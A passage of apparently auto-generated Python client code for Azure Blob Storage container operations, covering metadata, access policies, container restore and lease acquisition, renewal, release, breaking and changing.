query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if _lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
if metadata is not None:
header_parameters['x-ms-meta'] = self._serialize.header("metadata", metadata, 'str')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
if cls:
return cls(pipeline_response, None, response_headers)
set_metadata.metadata = {'url': '/{containerName}'} # type: ignore
async def get_access_policy(
self,
timeout: Optional[int] = None,
request_id_parameter: Optional[str] = None,
lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None,
**kwargs
) -> List["_models.SignedIdentifier"]:
"""gets the permissions for the specified container. The permissions indicate whether container
data may be accessed publicly.
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param lease_access_conditions: Parameter group.
:type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of SignedIdentifier, or the result of cls(response)
:rtype: list[~azure.storage.blob.models.SignedIdentifier]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List["_models.SignedIdentifier"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_lease_id = None
if lease_access_conditions is not None:
_lease_id = lease_access_conditions.lease_id
restype = "container"
comp = "acl"
accept = "application/xml"
# Construct URL
url = self.get_access_policy.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if _lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['x-ms-blob-public-access']=self._deserialize('str', response.headers.get('x-ms-blob-public-access'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
deserialized = self._deserialize('[SignedIdentifier]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
get_access_policy.metadata = {'url': '/{containerName}'} # type: ignore
async def set_access_policy(
self,
timeout: Optional[int] = None,
access: Optional[Union[str, "_models.PublicAccessType"]] = None,
request_id_parameter: Optional[str] = None,
container_acl: Optional[List["_models.SignedIdentifier"]] = None,
lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None,
modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None,
**kwargs
) -> None:
"""sets the permissions for the specified container. The permissions indicate whether blobs in a
container may be accessed publicly.
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param access: Specifies whether data in the container may be accessed publicly and the level
of access.
:type access: str or ~azure.storage.blob.models.PublicAccessType
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param container_acl: the acls for the container.
:type container_acl: list[~azure.storage.blob.models.SignedIdentifier]
:param lease_access_conditions: Parameter group.
:type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions
:param modified_access_conditions: Parameter group.
:type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_lease_id = None
_if_modified_since = None
_if_unmodified_since = None
if lease_access_conditions is not None:
_lease_id = lease_access_conditions.lease_id
if modified_access_conditions is not None:
_if_modified_since = modified_access_conditions.if_modified_since
_if_unmodified_since = modified_access_conditions.if_unmodified_since
restype = "container"
comp = "acl"
content_type = kwargs.pop("content_type", "application/xml")
accept = "application/xml"
# Construct URL
url = self.set_access_policy.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if _lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
if access is not None:
header_parameters['x-ms-blob-public-access'] = self._serialize.header("access", access, 'str')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
if _if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
serialization_ctxt = {'xml': {'name': 'SignedIdentifiers', 'wrapped': True, 'itemsName': 'SignedIdentifier'}}
if container_acl is not None:
body_content = self._serialize.body(container_acl, '[SignedIdentifier]', is_xml=True, serialization_ctxt=serialization_ctxt)
else:
body_content = None
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
if cls:
return cls(pipeline_response, None, response_headers)
set_access_policy.metadata = {'url': '/{containerName}'} # type: ignore
async def restore(
self,
timeout: Optional[int] = None,
request_id_parameter: Optional[str] = None,
deleted_container_name: Optional[str] = None,
deleted_container_version: Optional[str] = None,
**kwargs
) -> None:
"""Restores a previously-deleted container.
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param deleted_container_name: Optional. Version 2019-12-12 and later. Specifies the name of
the deleted container to restore.
:type deleted_container_name: str
:param deleted_container_version: Optional. Version 2019-12-12 and later. Specifies the
version of the deleted container to restore.
:type deleted_container_version: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
restype = "container"
comp = "undelete"
accept = "application/xml"
# Construct URL
url = self.restore.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
if deleted_container_name is not None:
header_parameters['x-ms-deleted-container-name'] = self._serialize.header("deleted_container_name", deleted_container_name, 'str')
if deleted_container_version is not None:
header_parameters['x-ms-deleted-container-version'] = self._serialize.header("deleted_container_version", deleted_container_version, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
if cls:
return cls(pipeline_response, None, response_headers)
restore.metadata = {'url': '/{containerName}'} # type: ignore
async def acquire_lease(
self,
timeout: Optional[int] = None,
duration: Optional[int] = None,
proposed_lease_id: Optional[str] = None,
request_id_parameter: Optional[str] = None,
modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None,
**kwargs
) -> None:
"""[Update] establishes and manages a lock on a container for delete operations. The lock duration
can be 15 to 60 seconds, or can be infinite.
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param duration: Specifies the duration of the lease, in seconds, or negative one (-1) for a
lease that never expires. A non-infinite lease can be between 15 and 60 seconds. A lease
duration cannot be changed using renew or change.
:type duration: int
:param proposed_lease_id: Proposed lease ID, in a GUID string format. The Blob service returns
400 (Invalid request) if the proposed lease ID is not in the correct format. See Guid
Constructor (String) for a list of valid GUID string formats.
:type proposed_lease_id: str
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param modified_access_conditions: Parameter group.
:type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_if_modified_since = None
_if_unmodified_since = None
if modified_access_conditions is not None:
_if_modified_since = modified_access_conditions.if_modified_since
_if_unmodified_since = modified_access_conditions.if_unmodified_since
comp = "lease"
restype = "container"
action = "acquire"
accept = "application/xml"
# Construct URL
url = self.acquire_lease.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['x-ms-lease-action'] = self._serialize.header("action", action, 'str')
if duration is not None:
header_parameters['x-ms-lease-duration'] = self._serialize.header("duration", duration, 'int')
if proposed_lease_id is not None:
header_parameters['x-ms-proposed-lease-id'] = self._serialize.header("proposed_lease_id", proposed_lease_id, 'str')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
if _if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
if cls:
return cls(pipeline_response, None, response_headers)
acquire_lease.metadata = {'url': '/{containerName}'} # type: ignore
async def release_lease(
self,
lease_id: str,
timeout: Optional[int] = None,
request_id_parameter: Optional[str] = None,
modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None,
**kwargs
) -> None:
"""[Update] establishes and manages a lock on a container for delete operations. The lock duration
can be 15 to 60 seconds, or can be infinite.
:param lease_id: Specifies the current lease ID on the resource.
:type lease_id: str
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param modified_access_conditions: Parameter group.
:type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_if_modified_since = None
_if_unmodified_since = None
if modified_access_conditions is not None:
_if_modified_since = modified_access_conditions.if_modified_since
_if_unmodified_since = modified_access_conditions.if_unmodified_since
comp = "lease"
restype = "container"
action = "release"
accept = "application/xml"
# Construct URL
url = self.release_lease.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['x-ms-lease-action'] = self._serialize.header("action", action, 'str')
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", lease_id, 'str')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
if _if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
if cls:
return cls(pipeline_response, None, response_headers)
release_lease.metadata = {'url': '/{containerName}'} # type: ignore
async def renew_lease(
self,
lease_id: str,
timeout: Optional[int] = None,
request_id_parameter: Optional[str] = None,
modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None,
**kwargs
) -> None:
"""[Update] establishes and manages a lock on a container for delete operations. The lock duration
can be 15 to 60 seconds, or can be infinite.
:param lease_id: Specifies the current lease ID on the resource.
:type lease_id: str
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param modified_access_conditions: Parameter group.
:type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_if_modified_since = None
_if_unmodified_since = None
if modified_access_conditions is not None:
_if_modified_since = modified_access_conditions.if_modified_since
_if_unmodified_since = modified_access_conditions.if_unmodified_since
comp = "lease"
restype = "container"
action = "renew"
accept = "application/xml"
# Construct URL
url = self.renew_lease.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['x-ms-lease-action'] = self._serialize.header("action", action, 'str')
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", lease_id, 'str')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
if _if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
if cls:
return cls(pipeline_response, None, response_headers)
renew_lease.metadata = {'url': '/{containerName}'} # type: ignore
async def break_lease(
self,
timeout: Optional[int] = None,
break_period: Optional[int] = None,
request_id_parameter: Optional[str] = None,
modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None,
**kwargs
) -> None:
"""[Update] establishes and manages a lock on a container for delete operations. The lock duration
can be 15 to 60 seconds, or can be infinite.
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param break_period: For a break operation, proposed duration the lease should continue before
it is broken, in seconds, between 0 and 60. This break period is only used if it is shorter
than the time remaining on the lease. If longer, the time remaining on the lease is used. A new
lease will not be available before the break period has expired, but the lease may be held for
longer than the break period. If this header does not appear with a break operation, a fixed-
duration lease breaks after the remaining lease period elapses, and an infinite lease breaks
immediately.
:type break_period: int
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param modified_access_conditions: Parameter group.
:type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_if_modified_since = None
_if_unmodified_since = None
if modified_access_conditions is not None:
_if_modified_since = modified_access_conditions.if_modified_since
_if_unmodified_since = modified_access_conditions.if_unmodified_since
comp = "lease"
restype = "container"
action = "break"
accept = "application/xml"
# Construct URL
url = self.break_lease.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['x-ms-lease-action'] = self._serialize.header("action", action, 'str')
if break_period is not None:
header_parameters['x-ms-lease-break-period'] = self._serialize.header("break_period", break_period, 'int')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
if _if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-lease-time']=self._deserialize('int', response.headers.get('x-ms-lease-time'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
if cls:
return cls(pipeline_response, None, response_headers)
break_lease.metadata = {'url': '/{containerName}'} # type: ignore
async def change_lease(
self,
lease_id: str,
proposed_lease_id: str,
timeout: Optional[int] = None,
request_id_parameter: Optional[str] = None,
modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None,
**kwargs
) -> None:
"""[Update] establishes and manages a lock on a container for delete operations. The lock duration
can be 15 to 60 seconds, or can be infinite.
:param lease_id: Specifies the current lease ID on the resource.
:type lease_id: str
:param proposed_lease_id: Proposed lease ID, in a GUID string format. The Blob service returns
400 (Invalid request) if the proposed lease ID is not in the correct format. See Guid
Constructor (String) for a list of valid GUID string formats.
:type proposed_lease_id: str
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param modified_access_conditions: Parameter group.
:type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_if_modified_since = None
_if_unmodified_since = None
if modified_access_conditions is not None:
_if_modified_since = modified_access_conditions.if_modified_since
_if_unmodified_since = modified_access_conditions.if_unmodified_since
comp = "lease"
restype = "container"
action = "change"
accept = "application/xml"
# Construct URL
url = self.change_lease.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['x-ms-lease-action'] = self._serialize.header("action", action, 'str')
